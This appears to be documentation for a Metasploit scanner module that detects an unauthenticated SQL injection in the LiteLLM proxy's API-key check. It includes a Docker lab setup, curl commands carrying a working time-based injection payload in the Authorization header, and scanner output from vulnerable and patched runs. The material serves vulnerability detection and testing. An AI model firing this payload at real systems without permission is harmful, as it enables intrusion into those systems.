LiteLLM is an LLM gateway/proxy. Versions 1.81.16 through 1.83.6 are affected by CVE-2026-42208 (CVSS 9.3, on the CISA KEV list), an unauthenticated SQL injection.
During API-key verification, the proxy interpolates the raw Authorization
bearer value into a PostgreSQL query without parameterization:
WHERE v.token = '<bearer value>'
LiteLLM only SHA-256-hashes bearer tokens that begin with sk-. A bearer value
that does not start with sk- is passed to the query verbatim, so a single
quote closes the string literal and the rest of the value is parsed as SQL.
The lookup runs on the authentication-failure path, so no valid credentials
are needed to reach it. Fixed in 1.83.7 by switching to a parameterized query
(commit 4dc416ee74).
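The hashing rule and the interpolation described above can be modeled in a few lines of Python. This is an illustrative sketch, not LiteLLM's code: the function names `lookup_value`, `vulnerable_query`, and `parameterized_query` are hypothetical, and the `$1` placeholder is an assumption about the general shape of a parameterized fix.

```python
import hashlib


def lookup_value(bearer: str) -> str:
    """Return the value compared against v.token (hypothetical model of the rule above)."""
    if bearer.startswith("sk-"):
        # sk- tokens are SHA-256 hashed; a hex digest cannot contain a quote.
        return hashlib.sha256(bearer.encode()).hexdigest()
    # Any other bearer value reaches the query unchanged.
    return bearer


def vulnerable_query(bearer: str) -> str:
    """Interpolate the value into the SQL text, as the affected versions are described to do."""
    return f"WHERE v.token = '{lookup_value(bearer)}'"


def parameterized_query(bearer: str) -> tuple[str, list[str]]:
    """Keep the value out of the SQL text and bind it separately (assumed shape of the fix)."""
    return "WHERE v.token = $1", [lookup_value(bearer)]


payload = "' OR (SELECT pg_sleep(5)) IS NULL --"
print(vulnerable_query(payload))       # the quote ends the literal early
print(vulnerable_query("sk-payload'"))  # hashed first, so the quote never reaches SQL
print(parameterized_query(payload))     # SQL text is constant; payload is only data
```

With the interpolated form the payload becomes part of the statement; with the bound form the statement text never changes, whatever the bearer value contains.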
This module confirms the flaw with a benign time-based check built on the
framework's PostgreSQL time-based blind SQL injection library
(Msf::Exploit::SQLi::PostgreSQLi::TimeBasedBlind). It issues one request whose
injected predicate calls pg_sleep only when a tautology is true and a second
request whose predicate never sleeps, and reports the target vulnerable only when
the first is delayed while the second returns promptly. A server that is merely
slow delays both requests and is not flagged. It never reads or exfiltrates data.
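The two-request decision rule can be sketched as below. The function name `classify` and the choice to compare both timings against the configured delay are assumptions made for illustration; the framework library may apply different thresholds internally.

```python
def classify(sleep_elapsed: float, control_elapsed: float, delay: float = 5.0) -> bool:
    """Return True only when the sleeping probe is delayed and the control is prompt.

    Hypothetical helper: both timings are in seconds, and `delay` is the
    number of seconds the injected pg_sleep was asked to wait.
    """
    sleep_delayed = sleep_elapsed >= delay
    control_prompt = control_elapsed < delay
    return sleep_delayed and control_prompt


print(classify(5.1, 0.03))   # delayed probe, prompt control
print(classify(6.0, 6.2))    # slow server: both requests are delayed
print(classify(0.04, 0.03))  # patched target: neither request is delayed
```

Requiring the control request to return promptly is what keeps a uniformly slow server from being reported as vulnerable.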
Detection requires the target to have provisioned at least one virtual key (see
Setup). The injectable predicate sits in a WHERE clause, which PostgreSQL
evaluates once per row it scans, so against an empty token table the predicate,
and with it pg_sleep, never runs. Any LiteLLM proxy in real use has issued keys,
but a freshly initialized proxy with no keys will not respond to the probe.
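Why an empty table produces no signal can be demonstrated with a small experiment. The sketch below uses Python's built-in SQLite as a stand-in for PostgreSQL, which is an assumption made purely so the example runs without a server; the table name `tokens` and the function `fake_sleep` are hypothetical. It illustrates the general behavior of row-by-row WHERE evaluation, not LiteLLM's actual query.

```python
import sqlite3


def count_predicate_calls(row_count: int) -> int:
    """Count how often a side-effecting function in a WHERE clause is invoked."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tokens (token TEXT)")
    conn.executemany(
        "INSERT INTO tokens (token) VALUES (?)",
        [(f"hash-{i}",) for i in range(row_count)],
    )

    calls = []

    def fake_sleep():
        # Stand-in for pg_sleep: records the call instead of sleeping.
        calls.append(1)
        return None

    conn.create_function("fake_sleep", 0, fake_sleep)
    # Same shape as the injected predicate: the token comparison fails,
    # so the right-hand side of OR must be evaluated for each scanned row.
    conn.execute(
        "SELECT token FROM tokens WHERE token = '' OR fake_sleep() IS NULL"
    ).fetchall()
    conn.close()
    return len(calls)


print(count_predicate_calls(0))  # empty table
print(count_predicate_calls(3))  # table with rows
```

On the empty table the function is never invoked; once rows exist it is invoked at least once, which is the condition the time-based check depends on.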
litellm_config.yaml:
model_list:
  - model_name: gpt-3.5-turbo
    litellm_params:
      model: huggingface/huggingface-model
      api_key: os.environ/FAKE_API_KEY
general_settings:
  master_key: os.environ/LITELLM_MASTER_KEY
  database_url: os.environ/DATABASE_URL
docker-compose.yaml (vulnerable — DB-backed mode is what creates the token table):
services:
  db:
    image: postgres:16
    environment:
      POSTGRES_DB: litellm
      POSTGRES_USER: litellm
      POSTGRES_PASSWORD: litellm123
    healthcheck:
      test: ["CMD-SHELL", "pg_isready -U litellm"]
      interval: 5s
      retries: 5
  litellm:
    image: litellm/litellm:main-v1.83.3-stable # vulnerable; use main-v1.83.7-stable for the patched run
    command: ["--config", "/app/config.yaml", "--port", "4000"]
    ports:
      - "4000:4000"
    volumes:
      - ./litellm_config.yaml:/app/config.yaml:ro
    depends_on:
      db:
        condition: service_healthy
    environment:
      DATABASE_URL: "postgresql://litellm:litellm123@db:5432/litellm"
      LITELLM_MASTER_KEY: "sk-master-test-key-1234"
Start it and wait for the proxy to connect to PostgreSQL and apply its schema
(the litellm_proxy_extras migration must finish before the token table exists;
/health/liveliness is unauthenticated and returns 200 once the server listens):
docker compose up -d
until curl -sf -o /dev/null http://localhost:4000/health/liveliness; do sleep 2; done
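The shell loop above waits indefinitely. For scripted lab runs, a bounded wait may be preferable; the following is a minimal sketch under that assumption. The helper names `wait_until` and `liveliness_ok`, the 120-second default timeout, and the injectable `sleep` and `clock` parameters are all hypothetical choices, not part of the module or of LiteLLM.

```python
import http.client
import time
import urllib.error
import urllib.request
from typing import Callable


def liveliness_ok(url: str = "http://localhost:4000/health/liveliness") -> bool:
    """Return True when the endpoint answers with a non-error status (like curl -f)."""
    try:
        with urllib.request.urlopen(url, timeout=5) as resp:
            return 200 <= resp.status < 400
    except (urllib.error.URLError, OSError, http.client.HTTPException):
        # Connection refused, timeout, or an HTTP error status: not ready yet.
        return False


def wait_until(
    check: Callable[[], bool],
    timeout: float = 120.0,
    interval: float = 2.0,
    sleep: Callable[[float], None] = time.sleep,
    clock: Callable[[], float] = time.monotonic,
) -> bool:
    """Poll `check` every `interval` seconds until it passes or `timeout` elapses."""
    deadline = clock() + timeout
    while True:
        if check():
            return True
        if clock() >= deadline:
            return False
        sleep(interval)
```

Calling `wait_until(liveliness_ok)` mirrors the shell loop but returns `False` instead of hanging if the proxy never comes up.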
Provision at least one virtual key. The injectable predicate sits in a WHERE
clause, which PostgreSQL evaluates once per row it scans, so on a proxy whose
LiteLLM_VerificationToken table is empty the pg_sleep never executes and the
target appears (falsely) safe. Any proxy in real use has issued keys; for the lab,
create one with the master key:
curl -s -X POST http://localhost:4000/key/generate \
-H 'Authorization: Bearer sk-master-test-key-1234' \
-H 'Content-Type: application/json' -d '{}'
Demonstrate the delay (control vs pg_sleep(5)):
curl -s -o /dev/null -w 'control: %{time_total}s\n' -X POST http://localhost:4000/v1/chat/completions \
-H 'Content-Type: application/json' -H 'Authorization: Bearer AAAA-control' \
-d '{"model":"gpt-3.5-turbo","messages":[{"role":"user","content":"x"}],"max_tokens":1}'
curl -s -o /dev/null -w 'inject: %{time_total}s\n' --max-time 30 -X POST http://localhost:4000/v1/chat/completions \
-H 'Content-Type: application/json' \
-H "Authorization: Bearer ' OR (SELECT pg_sleep(5)) IS NULL --" \
-d '{"model":"gpt-3.5-turbo","messages":[{"role":"user","content":"x"}],"max_tokens":1}'
Vulnerable: control ~0.03s, inject ~5s. Re-run with the main-v1.83.7-stable
image for the patched (true-negative) case — both return fast.
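The same control-versus-inject comparison can be scripted for the lab above. This is a sketch using only the Python standard library; the helper names `bearer_values`, `build_request`, and `time_request` are hypothetical, and the request body simply mirrors the curl commands.

```python
import json
import time
import urllib.error
import urllib.request

# Same JSON body as the curl commands above.
BODY = {"model": "gpt-3.5-turbo", "messages": [{"role": "user", "content": "x"}], "max_tokens": 1}


def bearer_values(delay: int = 5) -> dict[str, str]:
    """Return the control and injected bearer values used in the two requests."""
    return {
        "control": "AAAA-control",
        "inject": f"' OR (SELECT pg_sleep({delay})) IS NULL --",
    }


def build_request(base_url: str, bearer: str) -> urllib.request.Request:
    """Build the POST request without sending it."""
    return urllib.request.Request(
        f"{base_url}/v1/chat/completions",
        data=json.dumps(BODY).encode(),
        headers={"Content-Type": "application/json", "Authorization": f"Bearer {bearer}"},
        method="POST",
    )


def time_request(req: urllib.request.Request, timeout: float = 30.0) -> float:
    """Send the request and return the elapsed wall-clock seconds."""
    start = time.monotonic()
    try:
        urllib.request.urlopen(req, timeout=timeout).close()
    except urllib.error.HTTPError:
        # An error status still completes the round trip; only the timing matters.
        pass
    return time.monotonic() - start
```

Against the lab, timing `build_request("http://localhost:4000", value)` for each entry of `bearer_values()` reproduces the two curl measurements.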
msfconsole
use auxiliary/scanner/http/litellm_proxy_sqli
set RHOSTS <target>
set RPORT 4000
run
The LiteLLM chat completions endpoint that triggers key verification. Defaults to
/v1/chat/completions.
The model field placed in the request body. It need not be a real model — the
key lookup fails before model dispatch. Default gpt-3.5-turbo.
Advanced option from the framework SQL injection mixin: the number of seconds the
injected pg_sleep runs for the time-based check. A higher value is more robust
against network jitter at the cost of a slower scan. Default 5.0.
Captured against the Docker lab above (vulnerable main-v1.83.3-stable on port 4000,
patched main-v1.83.7-stable on port 4001), each with one provisioned virtual key.
msf6 > use auxiliary/scanner/http/litellm_proxy_sqli
msf6 auxiliary(scanner/http/litellm_proxy_sqli) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 auxiliary(scanner/http/litellm_proxy_sqli) > set RPORT 4000
RPORT => 4000
msf6 auxiliary(scanner/http/litellm_proxy_sqli) > run
[+] 127.0.0.1:4000 - The target is vulnerable. Time-based SQL injection via Authorization header confirmed (LiteLLM 1.83.3)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/litellm_proxy_sqli) > set RPORT 4001
RPORT => 4001
msf6 auxiliary(scanner/http/litellm_proxy_sqli) > run
[*] 127.0.0.1:4001 - The target is not exploitable. No time-based SQL injection signal observed
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed